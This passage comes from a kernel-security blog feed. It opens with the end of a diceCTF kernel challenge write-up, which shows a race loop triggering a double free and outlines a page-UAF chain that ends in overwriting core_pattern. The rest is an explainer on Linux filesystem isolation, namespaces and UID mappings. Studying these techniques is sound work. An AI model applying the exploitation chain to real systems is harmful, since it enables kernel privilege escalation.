    <span class="n">e</span> <span class="o">=</span> <span class="n">kmem_cache_alloc</span><span class="p">(</span><span class="n">cornelslop_entry_cachep</span><span class="p">,</span> <span class="n">GFP_KERNEL</span> <span class="o">|</span> <span class="n">__GFP_ZERO</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">sha256_va_range</span><span class="p">(</span><span class="n">e</span><span class="o">-&gt;</span><span class="n">va_start</span><span class="p">,</span> <span class="n">e</span><span class="o">-&gt;</span><span class="n">va_end</span><span class="p">,</span> <span class="n">e</span><span class="o">-&gt;</span><span class="n">shash</span><span class="p">);</span> <span class="c1">// [1]</span>
    <span class="c1">// [...]</span>
    <span class="n">id</span> <span class="o">=</span> <span class="n">alloc_id</span><span class="p">();</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">id</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="n">id</span><span class="p">;</span>
        <span class="k">goto</span> <span class="n">fail</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="c1">// [...]</span>
<span class="nl">fail:</span>
    <span class="n">kfree</span><span class="p">(</span><span class="n">e</span><span class="p">);</span> <span class="c1">// [2]</span>
    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>But in fact, the number of entries is still not enough. The reason is that the CPU does not reschedule automatically once the hole punch finishes, so the other threads do not get a chance to run and call <code class="language-plaintext highlighter-rouge">add_entry()</code>.</p>

<p>How to solve it? One solution is to <strong>punch the hole again and again</strong>, and it works perfectly 🤣!</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">while</span> <span class="p">(</span><span class="o">!</span><span class="n">stop</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">usleep</span><span class="p">(</span><span class="mi">50</span><span class="p">);</span>
    <span class="n">SYSCHK</span><span class="p">(</span><span class="n">fallocate</span><span class="p">(</span><span class="n">memfd</span><span class="p">,</span> <span class="n">FALLOC_FL_PUNCH_HOLE</span> <span class="o">|</span> <span class="n">FALLOC_FL_KEEP_SIZE</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">MAX_LEN</span><span class="p">));</span>
<span class="p">}</span>
</code></pre></div></div>

<p>However, we cannot accurately control the order in which threads call <code class="language-plaintext highlighter-rouge">kfree(e)</code>, which makes it quite unstable.</p>

<p>Anyway, it works 😉.</p>

<h3 id="23-page-uaf">2.3. Page UAF</h3>

<p>After we return the slab containing the UAF object back to the buddy system, we allocate lots of <strong>pipe pages</strong> to reclaim it.</p>

<p>Remember we still have a reference to the UAF object? We then call <code class="language-plaintext highlighter-rouge">delete_entry()</code> on that entry, and <code class="language-plaintext highlighter-rouge">kfree()</code> is applied to one of the pipe pages. So now we have a <strong>page UAF</strong>!</p>

<p>The remaining steps are fairly straightforward: spraying page tables, reading the empty zero page PTE, calculating the core pattern PTE, hijacking the page table, overwriting the core pattern, and finally triggering a segfault to read the flag.</p>]]></content><author><name></name></author><category term="Linux" /><summary type="html"><![CDATA[This week I played diceCTF 2026 with team fewer and spent 12 hours solving a Linux kernel challenge, cornelslop. This post is a simple writeup without too much detail, and you can find the full exploit here.]]></summary></entry><entry><title type="html">Filesystem 102</title><link href="https://u1f383.github.io/linux/2026/03/04/filesystem-102.html" rel="alternate" type="text/html" title="Filesystem 102" /><published>2026-03-04T00:00:00+00:00</published><updated>2026-03-04T00:00:00+00:00</updated><id>https://u1f383.github.io/linux/2026/03/04/filesystem-102</id><content type="html" xml:base="https://u1f383.github.io/linux/2026/03/04/filesystem-102.html"><![CDATA[<p>In <a href="/linux/2026/02/26/filesystem-101.html">Filesystem 101</a>, we covered the structural relationships of the Linux filesystem from a process perspective. In this post, we continue analyzing how it interacts with other kernel subsystems.</p>

<h2 id="1-isolation">1. Isolation</h2>

<h3 id="11-chroot-chdir-and-pivot_root">1.1. chroot, chdir and pivot_root</h3>

<p>To open a file, the kernel calls <code class="language-plaintext highlighter-rouge">path_openat()</code> to resolve the pathname and obtain the corresponding <code class="language-plaintext highlighter-rouge">path</code> object. This function determines the lookup starting directory based on <code class="language-plaintext highlighter-rouge">current-&gt;fs</code>, which is an <code class="language-plaintext highlighter-rouge">fs_struct</code> object containing the process’s <strong>current working path</strong> and <strong>root path</strong> information.</p>

<p>For example, if the pathname starts with <code class="language-plaintext highlighter-rouge">"/"</code>, <code class="language-plaintext highlighter-rouge">current-&gt;fs-&gt;root</code> is used; if the pathname is relative and <code class="language-plaintext highlighter-rouge">AT_FDCWD</code> is passed as the directory file descriptor, <code class="language-plaintext highlighter-rouge">current-&gt;fs-&gt;pwd</code> is used.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">fs_struct</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">users</span><span class="p">;</span>
    <span class="n">seqlock_t</span> <span class="n">seq</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">umask</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">in_exec</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">path</span> <span class="n">root</span><span class="p">,</span> <span class="n">pwd</span><span class="p">;</span>
<span class="p">}</span> <span class="n">__randomize_layout</span><span class="p">;</span>
</code></pre></div></div>

<p>Several syscalls can change this directory information: <code class="language-plaintext highlighter-rouge">chroot</code>, <code class="language-plaintext highlighter-rouge">chdir</code> and <code class="language-plaintext highlighter-rouge">pivot_root</code>.</p>

<p>The syscall <code class="language-plaintext highlighter-rouge">chroot</code> simply resolves the provided pathname and updates <strong><code class="language-plaintext highlighter-rouge">current-&gt;fs-&gt;root</code></strong>, but it requires the process to have the <strong><code class="language-plaintext highlighter-rouge">CAP_SYS_CHROOT</code> capability</strong> in its user namespace.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__do_sys_chroot(filename)
=&gt; user_path_at(AT_FDCWD, filename, lookup_flags, &amp;path)
=&gt; check ns_capable(current_user_ns(), CAP_SYS_CHROOT)
=&gt; set_fs_root(current-&gt;fs, &amp;path)
  =&gt; fs-&gt;root = *path
</code></pre></div></div>

<p>The syscall <code class="language-plaintext highlighter-rouge">chdir</code> resolves pathname and updates the working directory, <strong><code class="language-plaintext highlighter-rouge">current-&gt;fs-&gt;pwd</code></strong>. Unlike <code class="language-plaintext highlighter-rouge">chroot</code>, it requires no capability.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__do_sys_chdir(filename)
=&gt; user_path_at(AT_FDCWD, filename, lookup_flags, &amp;path)
=&gt; set_fs_pwd(current-&gt;fs, &amp;path)
  =&gt; fs-&gt;pwd = *path
</code></pre></div></div>

<p>The syscall <code class="language-plaintext highlighter-rouge">pivot_root</code> is the most complicated one. It is used to update the <strong>entire mount system</strong> rather than only the root directory or working directory. It requires the <code class="language-plaintext highlighter-rouge">CAP_SYS_ADMIN</code> capability and performs a lot of checks before updating. After these checks, it iterates over all processes and threads, finds those tasks whose <strong>working directory or root directory matches the old ones</strong>, and updates them to the new ones.</p>

<p>The whole process not only updates <code class="language-plaintext highlighter-rouge">current-&gt;fs</code>, but also involves <strong>mount point validation</strong> and <strong>namespace handling</strong>. Therefore, when setting up containers, <code class="language-plaintext highlighter-rouge">pivot_root</code> should be used to properly isolate execution environments.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__do_sys_pivot_root(new_root, put_old)
=&gt; may_mount()
  =&gt; ns_capable(current-&gt;nsproxy-&gt;mnt_ns-&gt;user_ns, CAP_SYS_ADMIN)

=&gt; user_path_at(AT_FDCWD, new_root, LOOKUP_FOLLOW | LOOKUP_DIRECTORY, &amp;new)
=&gt; user_path_at(AT_FDCWD, put_old, LOOKUP_FOLLOW | LOOKUP_DIRECTORY, &amp;old)
=&gt; get_fs_root(current-&gt;fs, &amp;root)
=&gt; ... lots of checks

=&gt; chroot_fs_refs(&amp;root, &amp;new)
  =&gt; iterate over all processes and threads
    =&gt; fs = p-&gt;fs
    
    =&gt; replace_path(&amp;fs-&gt;root, old_root, new_root)
      =&gt; if fs-&gt;root == old_root
        =&gt; fs-&gt;root = new_root
    
    =&gt; replace_path(&amp;fs-&gt;pwd, old_root, new_root)
</code></pre></div></div>
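
<p>The fix-up loop at the end of the trace can be sketched in user space. This is only a simplified model, not the kernel code: <code class="language-plaintext highlighter-rouge">struct path</code> and <code class="language-plaintext highlighter-rouge">struct fs_struct</code> are reduced to the fields used here, the task list is a plain array, and <code class="language-plaintext highlighter-rouge">chroot_fs_refs_model()</code> is a hypothetical name. Locking and reference counting are left out entirely.</p>

```c
#include <assert.h>
#include <stddef.h>

/* Simplified stand-ins for the kernel types; only the fields used here. */
struct path {
    const void *mnt;     /* which mount */
    const void *dentry;  /* which directory entry inside that mount */
};

struct fs_struct {
    struct path root;
    struct path pwd;
};

/* Swap *p for *new_path only if it refers to exactly old_path.
 * Returns 1 when a swap happened, 0 otherwise. */
static int replace_path(struct path *p, const struct path *old_path,
                        const struct path *new_path)
{
    if (p->mnt != old_path->mnt || p->dentry != old_path->dentry)
        return 0;
    *p = *new_path;
    return 1;
}

/* Model of the loop: visit every task's fs_struct and fix up root and pwd.
 * Returns the number of paths that were replaced. */
static int chroot_fs_refs_model(struct fs_struct **tasks, size_t ntasks,
                                const struct path *old_root,
                                const struct path *new_root)
{
    int replaced = 0;

    for (size_t i = 0; i < ntasks; i++) {
        assert(tasks[i] != NULL);
        replaced += replace_path(&tasks[i]->root, old_root, new_root);
        replaced += replace_path(&tasks[i]->pwd, old_root, new_root);
    }
    return replaced;
}
```

<p>Note that a task whose working directory is somewhere below the old root, rather than exactly at it, is left alone in this model, because the comparison is on the exact mount and dentry pair.</p>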

<h3 id="12-clone_fs-and-clone_newns">1.2. CLONE_FS and CLONE_NEWNS</h3>

<p>The kernel supports the system calls <code class="language-plaintext highlighter-rouge">unshare</code> and <code class="language-plaintext highlighter-rouge">clone</code> to create namespaces, isolating processes in different execution environments. In this post, we only discuss the <code class="language-plaintext highlighter-rouge">unshare</code> case, as the <code class="language-plaintext highlighter-rouge">clone</code> operation is largely similar.</p>

<p>The goal of the <code class="language-plaintext highlighter-rouge">unshare</code> syscall is to create a <strong>namespace proxy</strong> for a process. The namespace proxy is then installed with newly created namespaces. The simplified call trace is shown below; only function calls relevant to the later discussion are included.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__do_sys_unshare(unshare_flags)
=&gt; ksys_unshare(unshare_flags)
  =&gt; unshare_fs(unshare_flags, &amp;new_fs)
  =&gt; ...
  
  =&gt; unshare_nsproxy_namespaces(unshare_flags, &amp;new_nsproxy, new_cred, new_fs)
    =&gt; create_new_namespaces(unshare_flags, current, user_ns, new_fs ? new_fs : current-&gt;fs)
      =&gt; new_nsp = create_nsproxy()
      =&gt; new_nsp-&gt;mnt_ns = copy_mnt_ns(flags, tsk-&gt;nsproxy-&gt;mnt_ns, user_ns, new_fs)
      =&gt; ...
  
  =&gt; switch_task_namespaces(current, new_nsproxy)
    =&gt; p-&gt;nsproxy = new
</code></pre></div></div>

<p>Among all flags, two are directly related to the filesystem.</p>

<p>The first is <strong><code class="language-plaintext highlighter-rouge">CLONE_FS</code></strong>. It is used to <strong>duplicate the current <code class="language-plaintext highlighter-rouge">fs_struct</code> object (<code class="language-plaintext highlighter-rouge">current-&gt;fs</code>)</strong> so that updates to the root directory and the working directory can be performed without affecting other processes.</p>

<p><code class="language-plaintext highlighter-rouge">unshare_fs()</code> is called during the unsharing process. It creates a new <code class="language-plaintext highlighter-rouge">fs_struct</code> object, and all subsequent filesystem updates are performed on this new object instead of <code class="language-plaintext highlighter-rouge">current-&gt;fs</code>. Finally, if all operations complete successfully, <code class="language-plaintext highlighter-rouge">current-&gt;fs</code> is replaced with the new instance.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>unshare(unshare_flags)
=&gt; ...
=&gt; unshare_fs(unshare_flags, new_fsp)
  =&gt; *new_fsp = copy_fs_struct(fs)
    =&gt; fs = kmem_cache_alloc(fs_cachep)
    =&gt; fs-&gt;root = old-&gt;root
    =&gt; fs-&gt;pwd = old-&gt;pwd
=&gt; ...
=&gt; current-&gt;fs = new_fs
</code></pre></div></div>

<p>The second flag is <strong><code class="language-plaintext highlighter-rouge">CLONE_NEWNS</code></strong>. It is used to create a <strong>new mount namespace</strong>, allowing the process to have a private copy of the current filesystem that is not shared with other processes.</p>

<p>Internally, <code class="language-plaintext highlighter-rouge">copy_mnt_ns()</code> creates a new mount namespace (<code class="language-plaintext highlighter-rouge">new_ns</code>), duplicates the current filesystem tree from the root as a private tree, and then binds the new root to the newly created mount namespace object. It also needs to <strong>update <code class="language-plaintext highlighter-rouge">fs-&gt;root</code> and <code class="language-plaintext highlighter-rouge">fs-&gt;pwd</code></strong> so that they point to the new tree; otherwise, filesystem isolation would be broken.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>create_new_namespaces(flags, tsk, user_ns, new_fs)
=&gt; new_nsp = create_nsproxy()
=&gt; new_nsp-&gt;mnt_ns = copy_mnt_ns(flags, tsk-&gt;nsproxy-&gt;mnt_ns, user_ns, new_fs)
  =&gt; old = ns-&gt;root
  =&gt; new_ns = alloc_mnt_ns(user_ns, false)
  =&gt; new = copy_tree(old, old-&gt;mnt.mnt_root, copy_flags)
  =&gt; new_ns-&gt;root = new
  
  =&gt; traverse the trees
    =&gt; if (&amp;p-&gt;mnt == new_fs-&gt;root.mnt)
      =&gt; new_fs-&gt;root.mnt = mntget(&amp;q-&gt;mnt)
    =&gt; if (&amp;p-&gt;mnt == new_fs-&gt;pwd.mnt)
      =&gt; new_fs-&gt;pwd.mnt = mntget(&amp;q-&gt;mnt)
</code></pre></div></div>

<h2 id="2-permission-model">2. Permission Model</h2>

<h3 id="21-operation-check">2.1. Operation Check</h3>

<p>Before performing file-related operations, the kernel always calls functions following the <strong><code class="language-plaintext highlighter-rouge">may_XXX()</code> naming convention</strong> to verify <strong>whether a process has sufficient permissions</strong>.</p>

<p>For example, since mounting may affect the entire system, the process is required to have the <code class="language-plaintext highlighter-rouge">CAP_SYS_ADMIN</code> capability in the corresponding user namespace. This check is performed by <strong><code class="language-plaintext highlighter-rouge">may_mount()</code></strong>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">bool</span> <span class="nf">may_mount</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">return</span> <span class="n">ns_capable</span><span class="p">(</span><span class="n">current</span><span class="o">-&gt;</span><span class="n">nsproxy</span><span class="o">-&gt;</span><span class="n">mnt_ns</span><span class="o">-&gt;</span><span class="n">user_ns</span><span class="p">,</span> <span class="n">CAP_SYS_ADMIN</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Opening files is a more common case. Before reading, writing or executing a file, <strong><code class="language-plaintext highlighter-rouge">may_open()</code></strong> is invoked to check if the process has the required <strong>access permissions</strong>. The key function responsible for permission checking is <code class="language-plaintext highlighter-rouge">acl_permission_check()</code>.</p>

<p>It first retrieves the file mode from <strong><code class="language-plaintext highlighter-rouge">inode-&gt;i_mode</code></strong>, which corresponds to the permission bits (e.g., <code class="language-plaintext highlighter-rouge">-rw-r--r--</code>) shown in the output of the <code class="language-plaintext highlighter-rouge">ls -al</code> command. This value defines which users are allowed to access the file and with what permissions.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>may_open(idmap, path, acc_mode, flag)
=&gt; inode_permission(idmap, inode, MAY_OPEN | acc_mode)
  =&gt; do_inode_permission(idmap, inode, mask)
    =&gt; generic_permission(idmap, inode, mask)
      =&gt; acl_permission_check(idmap, inode, mask)
        =&gt; mode = inode-&gt;i_mode
        =&gt; vfsuid = i_uid_into_vfsuid(idmap, inode)
        =&gt; ... check
        =&gt; vfsgid = i_gid_into_vfsgid(idmap, inode)
        =&gt; ... check
</code></pre></div></div>

<p>It looks very straightforward: retrieving the access mode and checking the identifiers against that mode.</p>
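
<p>A minimal sketch of that mode check, assuming the classic owner/group/other selection. It deliberately ignores supplementary groups, POSIX ACLs, capability overrides and idmapped mounts, and <code class="language-plaintext highlighter-rouge">mode_allows()</code> is a hypothetical helper, not a kernel function. The <code class="language-plaintext highlighter-rouge">MAY_*</code> values are defined locally for the example.</p>

```c
#include <assert.h>
#include <stdbool.h>
#include <sys/stat.h>
#include <sys/types.h>

/* Access mask bits, defined locally for this sketch. */
#define MAY_EXEC  1
#define MAY_WRITE 2
#define MAY_READ  4

/* Pick the owner, group, or other permission triplet from the mode
 * and test it against the requested access mask. */
static bool mode_allows(mode_t mode, uid_t file_uid, gid_t file_gid,
                        uid_t fsuid, gid_t fsgid, int mask)
{
    unsigned int bits;

    assert((mask & ~(MAY_READ | MAY_WRITE | MAY_EXEC)) == 0);

    if (fsuid == file_uid)
        bits = (mode >> 6) & 7;   /* owner triplet */
    else if (fsgid == file_gid)
        bits = (mode >> 3) & 7;   /* group triplet */
    else
        bits = mode & 7;          /* other triplet */

    /* Every requested bit must be present in the selected triplet. */
    return ((unsigned int)mask & ~bits) == 0;
}
```

<p>Only one triplet is ever consulted: with mode <code class="language-plaintext highlighter-rouge">0077</code> the owner is denied read access in this model even though everyone else is allowed.</p>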

<p>But what are <code class="language-plaintext highlighter-rouge">i_uid_into_vfsuid()</code> and <code class="language-plaintext highlighter-rouge">i_gid_into_vfsgid()</code>? What is the difference between a UID (<code class="language-plaintext highlighter-rouge">uid</code>) and a VFS UID (<code class="language-plaintext highlighter-rouge">vfsuid</code>)?</p>

<p>Basically, every file stores its <strong>owner and group information</strong> in its <code class="language-plaintext highlighter-rouge">inode</code> object, namely <code class="language-plaintext highlighter-rouge">inode-&gt;i_uid</code> and <code class="language-plaintext highlighter-rouge">inode-&gt;i_gid</code>. However, due to the namespace mechanism, the same UID or GID value may correspond to different users in different user namespaces. Therefore, these identifiers must be <strong>converted into meaningful values</strong> before being used for permission checks.</p>

<p>This conversion is performed by <code class="language-plaintext highlighter-rouge">i_uid_into_vfsuid()</code> and <code class="language-plaintext highlighter-rouge">i_gid_into_vfsgid()</code>. Corresponding inverse conversion functions, <code class="language-plaintext highlighter-rouge">mapped_fsuid()</code> and <code class="language-plaintext highlighter-rouge">mapped_fsgid()</code>, are also provided.</p>

<p>Here, we only analyze the UID conversion path, as the GID handling follows the same mechanism.</p>

<p>If the idmap (<code class="language-plaintext highlighter-rouge">idmap</code>) points to the dummy one (<code class="language-plaintext highlighter-rouge">&amp;nop_mnt_idmap</code>), the kernel simply <strong>returns <code class="language-plaintext highlighter-rouge">inode-&gt;i_uid</code> as the VFS UID value</strong>. Otherwise, it <strong>looks up the corresponding VFS UID from the idmap (<code class="language-plaintext highlighter-rouge">idmap-&gt;uid_map</code>)</strong> using the UID in the user namespace rather than the init namespace.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>i_uid_into_vfsuid(idmap, inode)
=&gt; make_vfsuid(idmap, i_user_ns(inode), inode-&gt;i_uid)
  =&gt; if (idmap == &amp;nop_mnt_idmap)
    =&gt; return VFSUIDT_INIT(kuid)
  
  =&gt; uid = from_kuid(fs_userns, kuid)
  =&gt; return VFSUIDT_INIT_RAW(map_id_down(&amp;idmap-&gt;uid_map, uid))
</code></pre></div></div>

<p>The idmap is a member of the <code class="language-plaintext highlighter-rouge">vfsmount</code> structure and is used to map user IDs between namespaces.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">vfsmount</span> <span class="p">{</span>
    <span class="k">struct</span> <span class="n">dentry</span> <span class="o">*</span><span class="n">mnt_root</span><span class="p">;</span>       <span class="cm">/* root of the mounted tree */</span>
    <span class="k">struct</span> <span class="n">super_block</span> <span class="o">*</span><span class="n">mnt_sb</span><span class="p">;</span>    <span class="cm">/* pointer to superblock */</span>
    <span class="kt">int</span> <span class="n">mnt_flags</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">mnt_idmap</span> <span class="o">*</span><span class="n">mnt_idmap</span><span class="p">;</span>
<span class="p">}</span> <span class="n">__randomize_layout</span><span class="p">;</span>
</code></pre></div></div>

<p>By default, the idmap of a <code class="language-plaintext highlighter-rouge">mount</code> object is set to <code class="language-plaintext highlighter-rouge">&amp;nop_mnt_idmap</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>alloc_vfsmnt(name)
=&gt; mnt = kmem_cache_zalloc(mnt_cache)
=&gt; mnt-&gt;mnt.mnt_idmap = &amp;nop_mnt_idmap
=&gt; return mnt
</code></pre></div></div>

<p>A process can set the idmap of a specific mount point to that of a user namespace using the <strong><code class="language-plaintext highlighter-rouge">mount_setattr</code> syscall</strong> (the <code class="language-plaintext highlighter-rouge">open_tree_attr</code> syscall can also be used).</p>

<p>Internally, <code class="language-plaintext highlighter-rouge">build_mount_idmapped()</code> retrieves the user namespace object from the given <code class="language-plaintext highlighter-rouge">userns_fd</code>, which is a file descriptor obtained by opening file <code class="language-plaintext highlighter-rouge">"/proc/&lt;pid&gt;/ns/user"</code>. After that, the UID (<code class="language-plaintext highlighter-rouge">mnt_userns-&gt;uid_map</code>) and GID (<code class="language-plaintext highlighter-rouge">mnt_userns-&gt;gid_map</code>) mappings of the user namespace are duplicated and assigned to the mount point’s idmap (<code class="language-plaintext highlighter-rouge">mnt-&gt;mnt.mnt_idmap</code>).</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__do_sys_mount_setattr(dfd, path, flags, uattr, usize)
=&gt; wants_mount_setattr(uattr, usize, &amp;kattr)
  =&gt; copy_struct_from_user(&amp;attr, sizeof(attr), uattr, usize)
  =&gt; build_mount_kattr(&amp;attr, usize, kattr)
    =&gt; build_mount_idmapped(attr, usize, kattr)
      =&gt; CLASS(fd, f)(attr-&gt;userns_fd)
      =&gt; ns = get_proc_ns(file_inode(fd_file(f)))
      =&gt; mnt_userns = container_of(ns, struct user_namespace, ns)
      =&gt; kattr-&gt;mnt_userns = get_user_ns(mnt_userns)

=&gt; user_path_at(dfd, path, kattr.lookup_flags, &amp;target)

=&gt; do_mount_setattr(&amp;target, &amp;kattr)
  =&gt; mnt_idmap = alloc_mnt_idmap(kattr-&gt;mnt_userns)
    =&gt; copy_mnt_idmap(&amp;mnt_userns-&gt;uid_map, &amp;idmap-&gt;uid_map)
    =&gt; copy_mnt_idmap(&amp;mnt_userns-&gt;gid_map, &amp;idmap-&gt;gid_map)

  =&gt; kattr-&gt;mnt_idmap = mnt_idmap
  =&gt; mount_setattr_commit(kattr, mnt)
    =&gt; do_idmap_mount(kattr, m)
      =&gt; smp_store_release(&amp;mnt-&gt;mnt.mnt_idmap, mnt_idmap_get(kattr-&gt;mnt_idmap))
</code></pre></div></div>

<p>At this point, we know that a mount idmap is essentially derived from <strong>the idmap of a user namespace</strong>. In the next section, we will explain how to create an idmap and how the mapping works.</p>

<h3 id="22-uid--gid-mappings">2.2. UID &amp; GID mappings</h3>

<p>The user and group identifiers of a process are stored in <code class="language-plaintext highlighter-rouge">current-&gt;cred</code>, which is a <code class="language-plaintext highlighter-rouge">cred</code> object.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">cred</span> <span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">kuid_t</span> <span class="n">uid</span><span class="p">;</span>   <span class="cm">/* real UID of the task */</span>
    <span class="n">kgid_t</span> <span class="n">gid</span><span class="p">;</span>   <span class="cm">/* real GID of the task */</span>
    <span class="n">kuid_t</span> <span class="n">suid</span><span class="p">;</span>  <span class="cm">/* saved UID of the task */</span>
    <span class="n">kgid_t</span> <span class="n">sgid</span><span class="p">;</span>  <span class="cm">/* saved GID of the task */</span>
    <span class="n">kuid_t</span> <span class="n">euid</span><span class="p">;</span>  <span class="cm">/* effective UID of the task */</span>
    <span class="n">kgid_t</span> <span class="n">egid</span><span class="p">;</span>  <span class="cm">/* effective GID of the task */</span>
    <span class="n">kuid_t</span> <span class="n">fsuid</span><span class="p">;</span> <span class="cm">/* UID for VFS ops */</span>
    <span class="n">kgid_t</span> <span class="n">fsgid</span><span class="p">;</span> <span class="cm">/* GID for VFS ops */</span>
    <span class="c1">// [...]</span>
<span class="p">};</span>
</code></pre></div></div>

<p>When it comes to user namespaces, how does the kernel save the real UID and GID of a process?</p>

<p>Well, if we examine the implementation of <code class="language-plaintext highlighter-rouge">unshare_userns()</code>, we can see that it simply duplicates the current <code class="language-plaintext highlighter-rouge">cred</code> object, configures a new user namespace object (<code class="language-plaintext highlighter-rouge">ns</code>), and finally associates the <code class="language-plaintext highlighter-rouge">cred</code> with that namespace, <strong>without modifying the UID or GID information</strong>!</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>unshare_userns(unshared_flags, new_cred)
=&gt; cred = prepare_creds()
=&gt; create_user_ns(cred)
  =&gt; ns = kmem_cache_zalloc(user_ns_cachep)
  =&gt; set_cred_user_ns(new, ns)
=&gt; *new_cred = cred
</code></pre></div></div>

<p>This implies that the <code class="language-plaintext highlighter-rouge">cred</code> structure always preserves the real UID and GID. So, there must be another place that stores the UID and GID mapping information for each user namespace.</p>

<p><br /></p>

<p>We can identify where the mapping information is stored by examining the behavior of the <code class="language-plaintext highlighter-rouge">getuid</code> system call.</p>

<p>When <code class="language-plaintext highlighter-rouge">getuid()</code> is invoked immediately after unsharing into a new user namespace, the returned value may be <code class="language-plaintext highlighter-rouge">65534</code> (the <code class="language-plaintext highlighter-rouge">"nobody"</code> user). This happens when the UID <strong>cannot be mapped through the namespace’s UID mapping</strong> (<code class="language-plaintext highlighter-rouge">targ-&gt;uid_map</code>) during the lookup performed by <code class="language-plaintext highlighter-rouge">map_id_range_up()</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__do_sys_getuid()
=&gt; from_kuid_munged(current_user_ns(), current_uid())
  =&gt; uid = from_kuid(to, kuid)
    =&gt; map_id_up(&amp;targ-&gt;uid_map, __kuid_val(kuid))
      =&gt; map_id_range_up(map, id, 1)
        =&gt; extent = map_id_range_up_base(extents, map, id, count)
        =&gt; if (!extent)
          =&gt; id = -1
  
  =&gt; if (uid == -1)
    =&gt; uid = overflowuid // 65534
</code></pre></div></div>

<p>Clearly, a user namespace maintains its own UID mapping (<code class="language-plaintext highlighter-rouge">targ-&gt;uid_map</code>), along with an equivalent GID mapping, and these mappings are used to convert UIDs and GIDs within that user namespace into real UIDs (KUIDs) and GIDs (KGIDs), and vice versa.</p>

<p>Here comes another question: what data does the mapping actually store, and how does a process configure the mapping?</p>

<p>The file <code class="language-plaintext highlighter-rouge">/proc/&lt;pid&gt;/uid_map</code> allows a user to insert new mapping entries into <code class="language-plaintext highlighter-rouge">ns-&gt;uid_map</code>. Each entry follows the format <code class="language-plaintext highlighter-rouge">&lt;first&gt; &lt;lower_first&gt; &lt;count&gt;</code>, where <code class="language-plaintext highlighter-rouge">&lt;first&gt;</code> represents the <strong>first mapped UID in the current user namespace</strong>, <code class="language-plaintext highlighter-rouge">&lt;lower_first&gt;</code> represents the <strong>corresponding UID in the parent namespace</strong>, and <code class="language-plaintext highlighter-rouge">&lt;count&gt;</code> specifies the <strong>size of the mapping range</strong>.</p>

<p>For example, the entry <code class="language-plaintext highlighter-rouge">"0 1000 1"</code> means that UID <code class="language-plaintext highlighter-rouge">1000</code> in the parent user namespace is mapped to UID <code class="language-plaintext highlighter-rouge">0</code> in the current user namespace.</p>
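
<p>To make the entry format concrete, here is a small user-space model of the lookup in both directions. It is a sketch under assumptions: the extents live in a plain array searched linearly, <code class="language-plaintext highlighter-rouge">map_down()</code>, <code class="language-plaintext highlighter-rouge">map_up()</code> and <code class="language-plaintext highlighter-rouge">map_up_munged()</code> are hypothetical names that only mirror the idea of the kernel helpers, and <code class="language-plaintext highlighter-rouge">65534</code> is taken as the overflow ID as in the <code class="language-plaintext highlighter-rouge">getuid</code> trace above.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define OVERFLOW_ID 65534u            /* reported when no extent matches */
#define INVALID_ID  ((uint32_t)-1)    /* internal "not mapped" marker */

/* One "<first> <lower_first> <count>" entry. */
struct extent {
    uint32_t first;        /* first ID inside the namespace */
    uint32_t lower_first;  /* first ID in the parent namespace */
    uint32_t count;        /* length of the range */
};

/* Namespace ID to parent ID (the "down" direction). */
static uint32_t map_down(const struct extent *ext, size_t n, uint32_t id)
{
    for (size_t i = 0; i < n; i++) {
        assert(ext[i].count > 0);
        if (id >= ext[i].first && id - ext[i].first < ext[i].count)
            return ext[i].lower_first + (id - ext[i].first);
    }
    return INVALID_ID;
}

/* Parent ID to namespace ID (the "up" direction). */
static uint32_t map_up(const struct extent *ext, size_t n, uint32_t id)
{
    for (size_t i = 0; i < n; i++) {
        assert(ext[i].count > 0);
        if (id >= ext[i].lower_first && id - ext[i].lower_first < ext[i].count)
            return ext[i].first + (id - ext[i].lower_first);
    }
    return INVALID_ID;
}

/* "Munged" variant: unmapped IDs are reported as the overflow ID. */
static uint32_t map_up_munged(const struct extent *ext, size_t n, uint32_t id)
{
    uint32_t mapped = map_up(ext, n, id);

    return mapped == INVALID_ID ? OVERFLOW_ID : mapped;
}
```

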